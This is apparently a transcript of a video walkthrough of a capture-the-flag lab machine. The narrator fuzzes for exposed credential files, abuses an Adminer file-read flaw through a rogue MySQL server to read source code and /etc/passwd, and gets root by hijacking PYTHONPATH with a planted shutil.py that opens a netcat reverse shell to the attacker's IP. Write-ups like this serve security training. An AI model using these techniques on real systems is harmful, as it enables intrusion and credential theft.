What's up, everyone? Today I'm doing a walkthrough of adminer from HackTheBox, which was categorized as an easy Linux box. We start this box off with our nmap scan, we find some credentials after fuzzing the web server, we get logged into FTP, we fuzz some more and find a vulnerable adminer instance which we exploit to gain access to more credentials, getting us a shell on the box. For root, we exploit the fact that we can run Python with sudo, so we just modify the Python path, resulting in code execution as root. So let's get started. Okay, we're going to start this box off with nmap sv scoa, put it in the nmap directory, and we'll call it adminer, and the IP address is 10.10.10.187. I've already run this, so let's take a look at the output. And we see we have FTP, SSH, and HTTP open with a robots disallowed entry admin-dir. So let's go check that out. So on the home page, looks like just a bunch of pictures. Looking at admin-dir, we get a forbidden. So coming back to robots.txt, .txt, we see this folder contains personal contacts, creds, so no one, not even robots, should see it, waldo. So from this, we can make a small word list. So coming over here, because it says this folder contains personal contacts and creds, no one should see it, so we can just kind of make a list: personal, data, contacts, creds, credentials, username, password. We can do usernames and passwords, and we can do Waldo since his name was in there. Okay, so from this, we can just kind of use this as our small word list, and we can use ffuf -u http 10.10.10.187 admin-dir and what we're looking for. So we'll try HTML with our word list, and we'll match any response codes that are 200, and we don't see any. So to get rid of this ffuf output every time, you can just do ffuf -s for silent, and we don't get an output. So we can just do the same thing. We can try .php, and we don't get anything. We can try .txt, and we see we have contacts and credentials that came back as a 200. So we can just try to wget that. So we're just going to wget this whole URL right here, /contacts.txt, and we'll do the same thing for credentials. Okay, so looking at credentials, looks like we have an internal mail account, an FTP account, and a WordPress account. So we know that FTP is open, so we might be able to log in as FTP user. So we'll do FTP user and this password. And we successfully logged in. So from here, we have two files, dump.sql and HTML, so I'll go ahead and grab them. Okay. So looking here, let's look at SQL. We'll just run strings on it. And it doesn't really look like there's a whole lot in here. Yeah, not a whole lot. We do get the database name, so that could be handy. And then we have that HTML dump. So I'm just going to make a directory called HTML. I'm going to move that in there. And then we'll just extract it. Okay, so it looks like we have a bunch of stuff. We have a utility scripts and a Waldo secret directory. So we can go into Waldo secret directory, look in here. Are they the same thing? We didn't look at that contacts folder earlier, or contacts file earlier, but what do the credentials look like? Looks like we have a bank account, Waldo11, with this password. So we could probably try this with SSH and as Waldo at 10.10.10.187. And we'll just throw that password in there. and it doesn't seem to work. So no luck there. What else do we have? We have an index.php. So the index.php that we visited, it looked like a bunch of images. And that's kind of what this one's doing. Looks like it connects to a SQL database, but you can tell the syntax looks kind of weird. Because there is a syntax error. Looks like right here. This quote isn't escaped, or these aren't in single quotes, so the quote string breaks right here. So this can't be Waldo's password because this index.php wouldn't even work. But we can try it anyway. Waldo at 10.10.10.187. Throw in that password, and we don't get anything. But it is worth noting that if we could get the index.php source code, that might be very useful to us because it is pulling those images, maybe out of the database. So we're successfully connecting to the database, so that might be something to keep in mind. So let's go check out these utility scripts. And in here we have an admin tasks. So administrative tasks, available options, use system uptime, backup password file, backup database. None of these are working, it says. Currently not working because they need root privileges. Looks like it's throwing some stuff to exec. So where is that? It was called admin-task.php. Is that in the admin directory? Oh no, it's in utility scripts. Which is in the admin directory? No, it's in HTML. Okay, so utility scripts. Oh, I didn't spell it right. Utility scripts. There we go. Okay, so we get a forbidden. So in there, we have that admin tasks. Yeah, so we can view system uptime, view logged in users, and view cron tab. And we can see at least what user we're running as, so we're www data, which I guess makes sense since it's a web server. Okay, looking at dbadmin, what do we have? Server, username, password. So this looks like a SQL connection. To do, finish implementing this or find a better open source alternative. So this kind of hints that maybe there's something else in this directory that's not listed that might be the framework that's allowing these to work. Oh, we just have a PHP info and let's PHP test. Okay, just echo some stuff. Okay, so looking in the utility scripts directory, we could try fuzzing this again. So we'll just ffuf http 10.10.10.187 and we can try fuzzing here first. With our word list, we'll do user share word list dir. We'll do big. So let this run. Okay, so we didn't find anything in the root directory other than some redirects, robots.txt, and server status. So we can look in that utility scripts directory, which is just after the root. So utility scripts, and let this run. Okay, so it looks like this really isn't finding anything either. So I'm gonna fuzz for PHP files that we may have missed in this directory, and let this one go for a while. Okay, so it comes back with adminer. So let's go check out adminer.php. It's taking a minute to load. Okay, so the page finally loaded. Looks like we have adminer 462. It's asking for login. So we have those credentials from earlier, but we can also use search exploit to see if there are any exploits for this. And it looks like we just have an SSRF in search exploit, but if we search Google, looks like there might be a vulnerability in this version. Up to 4.62 found vulnerable. So from here, how does it work? The attacker will access the victim's adminer instance, but instead of trying to connect to the victim's MySQL database, they connect back to their own, hosted on their own server. So looking over at this, it says what server we want to connect to. So we can probably drop into MySQL. One sec, let me get this up. Okay, so we can just connect to MySQL. And so what is this thing saying? The victim's adminer will connect to our own database. They use the MySQL command, load data local. So we just kind of, looks like we just need to create a database. So create database. Is that how you do that? Create, and then the name. So we'll say create adminer. Or do I need to create database adminer? Ah, there we go. Okay, so now we can use adminer. That, cool. And then if we create a user, we might be able to log into that instance. So what we can do is we can grant all privileges on adminer to, would be adminer.star for all the tables, to evil at I don't know which IP I should use. We'll try 10.10.10.187, and we'll see if this works. Because that's the server that we're going to be connecting from. Identified by the password. What's happening? There we go. Identified by password. Like that. Okay, so we'll see if we can log in. So our IP is 10.10.14.34, and the and the database is adminer. Password is password, and the user is evil. So let's try this. See if it logs in. And look at that, logged us in. Okay, so we're logged in. What do we need to do now? Looks like there's like a little video proof of concept here. Using the victim's adminer, they use the MySQL command load data local, specifying a local file on the victim server. This command is used to load data from a file local to the adminer instance into a database. Okay. So that index.php file that we were talking about earlier that had the syntax error in it, that might be something that we target because we want to get the real credentials, because whatever is connecting to the database is doing it successfully. So we can start by running a SQL command. And it says, how does it work? We use the load data local. So we can load data local in file, and I think the file we're after, which we can try etc password first, just as a proof of concept, into a table. And we might actually need to have a table created. So we're using database, so create table info. Table must have at least one column. What if we just gave it a table called PSSWD, like that? And then fields terminated by new line. I'll try this out. So this doesn't exist, so we need to create the table. So we need one column, create table info, column 1, text. Does that work? Cool. So show tables. We have info. Great. So let's run this again. Oh, into table info, because we changed the name for some reason. Based or restriction in effect, unable to open file. So it's trying to grab something, but it doesn't look like it can read it. So let's try var html index.php to see if we can load this. And 123 rows affected. So let's look at that. Can we just export as a CSV? Or we can just come back over here, actually. Select star from info. And if we scroll back through this, it looks like we have all of the information, the source code from index.php. It's not pretty, but it's here. So scrolling up to where that connection is, looks like we've got a password, so we can try this. So we'll SSHN as Waldo at 10.10.10.187. Throw that password in there, and look at that. That's user. Okay, so now we need to escalate to root. Running sudo -l. We don't know oh, we do know the password for Waldo. It looks like Waldo may run the following commands on adminer. So we can run all SETENV, so that means that we can set environment variables. And we can run this, admin tasks. So let's go check out what admin tasks is doing. What's in here? We have admin tasks. Okay, we don't have them. Whatever. Okay, so looking at this, what is this doing? It's a bash script. It's uptime, users, view cron tab, backup password. So if our effective user ID is 0, which means if we're effectively root, then back this up, backup etc password. So since we're already root here, I was going to point out that maybe this is a race condition, but I don't actually know if it is, because you effectively have to be root anyway to catch this before it changes it to 600. And then so shadow, same thing, backs up etc shadow, backup web, runs op scripts backup.py if the effective user ID is 0. So that's in our current directory. So let's look at that. This is writable by admin groups. Who are we? We are in the admin group. So we can't. Oh, no, it's not. It's only readable. No, it's not even readable. Can we even read this? Yeah, we can read this. Oh, that's all we can do though. Admins can only read it. Root can execute this. So if I tried to run backup.py, yeah, permission denied. But we can't, it looks like we can run admin tasks. We just don't know exactly what's in. Oh, we do know what's in backup.py. So from shutil import make archive and the source. So since we can control the environment variables, so like I could run sudo opt scripts admin tasks and it'll run. And we can also set environment variables. So if I wanted to back up web data, it runs. If I wanted to do this again and I wanted to back up the database, it runs. So it runs as root because we're running it as sudo. So since we can set environment variables, we can sudo PYTHONPATH and set that to whatever we want. So we can, and the reason that's important is because if we look at backup, we see from shutil, it will read the current, Python will read the current directory you're in for a library. So if, let me exemplify this real quick. If I run Python, and then we import sys, and then I ran print sys.path. It reads your current directory first. So if we change our Python path, so let's say I ran sudo python path equals user, then ran Python, then I did import sys, and then print sys.path. It loads user first, so it's going to look for libraries in this directory first. So you can kind of see where I'm going with this now, because what we can do is we can go into temp and we can make a directory called evil, and then in evil we can make a script called shutil, and it's going to try to import the function make archive from shutil. So if I create an shutil.py, which we don't have vim on this box, so I'm going to go to my box and write this. And in here, we just do import OS, and we create a function called make archive that accepts in A, B, and C, because it's calling make archive with DST, gztar, and src. So we just needed to accept 3 parameters, and then we can just set all those back to nothing. And then we can run some code. So from here, what we can do is os.system bin bash. And that might work. If that doesn't work, we might need to run some code to make a reverse shell. Okay, so now we've got our evil shutil.py. So I'll Python run some simple HTTP server to get this transferred over. And then we'll curl 10.10.10.14.34 shutil.py. We don't have curl, okay. So we'll wget okay, except that I put too many 10s in there. And then I think we want to save, yeah, it'll save. Connection refused. Oh, port 8000. Cool. Okay, what is happening? Module object has no attribute. Okay. It didn't like that. Okay, so I'm just gonna cat shutil, and we're just gonna echo this into a file. So we'll just echo this whole string into shutil.py. So now if we look at it, there's our code. It's gonna import OS. It's gonna write this function, and then our backup script is going to call that. So if we come back to opt scripts, and we look at backup.py, we need to look at admin tasks to see which one calls backup.py. So which one of these was it? There it is, backup web. So backup web will run opt scripts backup.py. It sends it to the background. So we might need some reverse shellcode. We'll test it. So we can run sudo PYTHONPATH equals temp evil, and then our script, which is, oh, I guess we can just, yeah, opt scripts admin tasks. So then we want to backup web. Oh, I see. So I need to head back over to temp evil. We have a syntax error, but it's definitely trying to run that function, which is good. There we go. So we'll just do this, copy it over to the box since Python's being strange. Echo that into shutil.py. Head back over to opt scripts, or we can just actually run it from here, it doesn't matter. And we'll back up web. And it looks like it didn't really do what we wanted it to, so it's running the function. So what we can do instead is come here, and we can just see, do we have netcat? Okay, do we have the -e option? We do. Okay, so we can just run netcat instead of bin bash. So we can do os.system netcat -e bin bash IP address 10.10.14.34 and a port 1234, and we'll be done with that. Except that yeah, that's fine. Actually, though, yeah, okay. I realized that I was using single quotes, and so that got funky, but I think that's fine. So we can just copy this, and we'll just use double quotes. Echo that into shutil.py. We'll set up our listener. Try running this again. Where was it? There we go. And we'll back up the data, or back up the web. And we get a connect. Earlier, it looks like I ran option 7. So I want to try that again. But connect python-c import pty.spawn bin bash. Who am I? ID and hostname. We are root on adminer, and we can read root.txt. Okay, so I'm going to keep the shell open. I'm going to see if I can just run bin bash because I totally ran the wrong option, but I'm not super sure if it'll work because it uses the ampersand, which should send that to the background. So we're going to test this out to find out for sure. So we'll do the same thing, echo that into shutil.py. Run our command again. We're going to back up the web data, which is 6. Yeah, and it runs in the background. So that does not drop us into a root shell. But sending back netcat to our shell does. And that's pretty much it for the box. I hope you enjoyed this one, and I'll catch you guys next week.